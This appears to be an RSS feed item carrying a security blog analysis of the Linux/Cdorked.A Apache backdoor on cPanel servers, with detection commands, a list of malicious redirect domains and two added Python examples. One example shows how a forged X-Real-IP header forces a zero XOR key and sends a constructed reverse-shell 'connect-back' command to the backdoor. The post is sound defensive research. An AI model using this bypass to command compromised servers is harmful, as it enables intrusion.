				<content:encoded><![CDATA[<p>For the last few months we have been tracking server level compromises that have been utilizing malicious Apache modules (Darkleech) to inject malware into websites. Some of our previous coverage is available <a href="http://blog.sucuri.net/2013/01/server-side-iframe-injections-via-apache-modules-and-sshd-backdoor.html">here</a> and <a href="http://blog.sucuri.net/2013/02/web-server-compromise-debian-distro-identify-and-remove-corrupt-apache-modules.html">here</a>.</p>
<p>However, during the last few months we started to see a change on how the injections were being done. On cPanel-based servers, instead of adding modules or modifying the Apache configuration, the attackers started to replace the Apache binary (httpd) with a malicious one. This new backdoor is very sophisticated and we worked with our friends from <a href="http://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole">ESET</a> to provide this report on what we are seeing.<br />
<span id="more-7057"></span></p>
<h5>Detection</h5>
<p>In our previous posts, we recommended the utilization of tools like &#8220;rpm -Va&#8221; or &#8220;rpm -qf&#8221; or &#8220;dpkg -S&#8221; to see if the Apache modules were modified. However, those techniques won&#8217;t work against this backdoor. Since cPanel installs Apache inside /usr/local/apache and does not utilize the package managers, there is no single and simple command to detect if the Apache binary was modified.</p>
<p>They also keep the same timestamp on the binary, so you can&#8217;t tell from the file&#8217;s modification time. A good and reliable way to identify the modified binary is to search for the string &#8220;open_tty&#8221; in the httpd directory:</p>
<blockquote><p>
# grep -r open_tty /usr/local/apache/
</p></blockquote>
<p>If it finds open_tty in your Apache binary, it is likely compromised, since the original Apache binary does not contain a call to open_tty. Another interesting point is that if you try to just replace the bad binary with a good one, you will be denied, because they set the file attribute to immutable. So you have to run chattr -ai before replacing it:</p>
<blockquote><p>
# chattr -ai /usr/local/apache/bin/httpd
</p></blockquote>
<h5>Injections</h5>
<p>The compromised binary doesn&#8217;t change anything about the site in terms of functionality or how the site looks; however, on some requests (once per day per IP address) instead of just serving the content it also adds a malicious redirect. That causes the browser to load content from what seem to be random domains:</p>
<blockquote><p>
http://893111632ce77ff9.aliz.co.kr/index.php (62.212.130.115)<br />
http://894651446c103f0e.after1201.com (62.212.130.115)<br />
http://328aaaf8978cc492.ajintechno.co.kr (62.212.130.115)<br />
http://23024b407634252a.ajaxstudy.net (62.212.130.115)<br />
http://cdb9156b281f7b01.ajuelec.co.kr (62.212.130.115)<br />
http://894651446c103f0e.after1201.com (62.212.130.115)<br />
..
</p></blockquote>
<p>And many others like that. So if a browser requests a JavaScript file, the server returns a 302 (redirect) pointing to:</p>
<blockquote><p>
Location: http://dcb84fc82e1f7b01.alarm-gsm.be/index.php?j=originalfilebase64
</p></blockquote>
<p>Where &#8220;originalfilebase64&#8221; is the base64 encoded form of the URL that was requested. That allows the attackers to return the malware along with the original content, so the page keeps working. Once the malware is loaded it redirects the visitor to spammy sites (most often porn pages). At the sites we analyzed, visitors were being pushed to httx://amazingtubesites.org (seems offline now). In some cases we also saw the redirection going to the Blackhole Exploit kit.</p>
<p>Note that those URLs change very often; the ESET team has identified more than 30,000 variations of them.</p>
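<p>Because the domains rotate, matching on a blocklist is hopeless; the stable indicators are the shape of the redirect itself: a 30x whose Location host starts with a 16-hex-character label on an otherwise ordinary domain, and a <code>j</code> parameter that base64-decodes to the URL the browser just asked for. The following is an added example, not code from this post or from ESET: it classifies Location headers on those two indicators and cross-checks the decoded <code>j</code> against the original request. The sample responses are constructed (in particular the base64 value, which the post only names symbolically); the redirect target domain and the hex-label domains in the test come from the list above.</p>

```python
"""Recognise the redirect pattern described in the post: a 30x whose Location
host begins with a 16-hex-character label on an otherwise legitimate domain
and whose `j` query parameter base64-encodes the URL that was requested.
Added example, not code from the post or from ESET; the sample responses are
constructed, in particular the base64 value the post only names symbolically.
"""
import base64
import binascii
import re
from urllib.parse import unquote, urlsplit

HEX_LABEL = re.compile(r"^[0-9a-f]{16}$")
J_PARAM = re.compile(r"(?:^|&)j=([^&]*)")  # read raw so '+' and '=' survive


def decode_j_param(query):
    """The decoded `j` value if it is base64 of a URL, otherwise None."""
    m = J_PARAM.search(query or "")
    if not m:
        return None
    raw = unquote(m.group(1))
    try:
        padded = raw + "=" * (-len(raw) % 4)   # tolerate stripped padding
        text = base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.startswith(("http://", "https://", "/")) else None


def classify_location(location):
    """Break a Location value into the indicators the post describes."""
    parts = urlsplit(location.strip())
    host = parts.hostname or ""
    first_label = host.split(".")[0] if host else ""
    hex_sub = bool(HEX_LABEL.match(first_label))
    original = decode_j_param(parts.query)
    return {
        "host": host,
        "hex_subdomain": hex_sub,
        "original_url": original,
        "suspicious": hex_sub and original is not None,
    }


def scan_responses(responses):
    """responses: iterable of (request_url, status, headers). Returns the hits,
    each noting whether the decoded `j` echoes the request that triggered it."""
    hits = []
    for url, status, headers in responses:
        if status not in (301, 302, 303, 307, 308):
            continue
        location = headers.get("Location") or headers.get("location")
        if not location:
            continue
        info = classify_location(location)
        if info["suspicious"]:
            info["request_url"] = url
            info["echoes_request"] = info["original_url"] == url
            hits.append(info)
    return hits


# Constructed sample traffic: one injected redirect, one normal page, one benign redirect.
REQUESTED_JS = "http://example.com/wp-includes/js/jquery.js"
SAMPLE_RESPONSES = [
    (REQUESTED_JS, 302, {"Location": "http://dcb84fc82e1f7b01.alarm-gsm.be/index.php?j="
                         + base64.b64encode(REQUESTED_JS.encode()).decode()}),
    ("http://example.com/", 200, {"Content-Type": "text/html"}),
    ("http://example.com/old", 301, {"Location": "http://example.com/new"}),
]

if __name__ == "__main__":
    for hit in scan_responses(SAMPLE_RESPONSES):
        print(hit["host"], "<-", hit["original_url"])
```

<p>Since the injection fires only once per day per client IP, a single fetch from the office will usually come back clean; feed the scanner a day&#8217;s worth of proxy or crawler logs, ideally from several source addresses, before concluding a server is not affected.</p>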
<h5>The Backdoor</h5>
<p>Our friends from ESET (Marc-Etienne, Olivier Bilodeau and Pierre-Marc Bureau) also analyzed the binary and discovered a nasty hidden backdoor. You have to read the full article <a href="http://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole">here</a> to get more details, but here is a brief explanation quoted from there:</p>
<blockquote><p>
Linux/Cdorked.A is one of the most sophisticated Apache backdoors we have seen so far. Although we are still processing the data, our Livegrid system reports hundreds of compromised servers and thousands of potential victims. The backdoor leaves no traces on the hard drive of compromised hosts other than its modified httpd binary. All the information related to the backdoor is stored in shared memory, the configuration is pushed by the attacker through obfuscated HTTP requests that aren&#8217;t logged in normal Apache logs. This means that no command and control information is stored anywhere on the system.<br />
..<br />
The HTTP server is equipped with a reverse connect backdoor that can be triggered via a special HTTP GET request. It is invoked when a request to a special path is done with a query string in a particular format, containing the hostname and port to connect. The client IP of the HTTP dialog is used as a key to decrypt the query string as a 4 byte XOR key. Additionally, IP specified in X-Real-IP or X-Forwarded-For headers will override the client IP as the XOR key. This means we can craft a X-Real-IP header that will in effect be a “\x00\x00\x00\x00” key&#8230;
</p></blockquote>
<p>As you can see, the attackers don&#8217;t need any files to act as a backdoor and just use the Apache binary for it.</p>
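<p>The key-handling detail in ESET&#8217;s description is worth seeing in code, because it is also why the backdoor works for an operator sitting behind NAT or a proxy. What follows is an added example, not the backdoor&#8217;s code: it derives the 4-byte XOR key from the client IP, lets a client-supplied X-Real-IP or X-Forwarded-For header replace that IP, and shows that a header of 0.0.0.0 forces an all-zero key so the query string is taken verbatim. The octet order (dotted quad in order), the precedence between the two headers and the sample message are assumptions made only for the illustration.</p>

```python
"""Walk through the key weakness in ESET's description: the backdoor XORs the
query string with a 4-byte key taken from the client IP, but a client-supplied
X-Real-IP / X-Forwarded-For header replaces that IP. Added example, not the
backdoor's code; the octet order, the header precedence and the sample
message are assumptions made only for the illustration.
"""


def key_from_ip(ip):
    """Four dotted-quad octets become the 4-byte XOR key (assumed byte order)."""
    octets = [int(o) for o in ip.strip().split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError("not an IPv4 address: " + ip)
    return bytes(octets)


def effective_key(remote_addr, headers):
    """Key the server would actually use: proxy headers win over the socket peer."""
    for name in ("X-Real-IP", "X-Forwarded-For"):
        value = headers.get(name)
        if value:
            return key_from_ip(value.split(",")[0])  # first hop, as proxies write it
    return key_from_ip(remote_addr)


def xor_bytes(data, key):
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def server_decrypt(remote_addr, headers, query_bytes):
    """What the backdoor recovers from an incoming query string."""
    return xor_bytes(query_bytes, effective_key(remote_addr, headers))


def demo():
    """A client behind NAT cannot know the key the server derives from its public
    address, so it sends X-Real-IP: 0.0.0.0 and its bytes are accepted as-is."""
    command = b"connect-back 203.0.113.5:4444"  # constructed payload, format assumed
    # Honest path: the key comes from the real peer address and decrypts correctly.
    ct = xor_bytes(command, key_from_ip("198.51.100.7"))
    assert server_decrypt("198.51.100.7", {}, ct) == command
    # The weakness: a zero key is forced, so the plaintext itself can be sent.
    forced = server_decrypt("198.51.100.7", {"X-Real-IP": "0.0.0.0"}, command)
    return forced == command


if __name__ == "__main__":
    print("zero-key bypass works:", demo())
```

<p>The defensive reading of this is the usual one: a server should trust X-Forwarded-For and X-Real-IP only from a proxy it controls, and in this case the "cipher" is a repeating 4-byte XOR whose key the client chooses, so there is no secrecy to begin with; the headers merely remove the last bit of guesswork.</p>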
<h5>The Random URLS</h5>
<p>One thing that struck us as very suspicious is that most of the random domains being used as the first level redirection belong to legitimate sites with their DNS hosted at dothost.co.kr:</p>
<blockquote><p>
ajaxstudy.net name server ns1.dothost.co.kr.<br />
ajaxstudy.net name server ns2.dothost.co.kr.
</p></blockquote>
<p>We are still unsure whether those are compromised accounts or whether the attackers got some type of access to the DNS provider to inject random sub domains into domains hosted there. We are still tracking how those URLs change, so we will post more details later.</p>
<h5>Final thoughts</h5>
<p>When attackers get full root access to the server, they can do anything they want. From modifying configurations, to injecting modules and replacing binaries. However, their tactics are changing to make it even harder for admins to detect their presence and recover from the compromise. </p>
<p>We also don&#8217;t have enough information to pinpoint how those servers are initially being hacked, but we suspect brute force attacks against sshd.</p>
<p>We will keep monitoring these attacks and we will provide more information as we get them.</p>
<img src="http://feeds.feedburner.com/~r/SucuriSecurity/~4/nK9BOpbeocA" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2013/04/apache-binary-backdoors-on-cpanel-based-servers.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2013/04/apache-binary-backdoors-on-cpanel-based-servers.html</feedburner:origLink></item>
	</channel>
</rss>
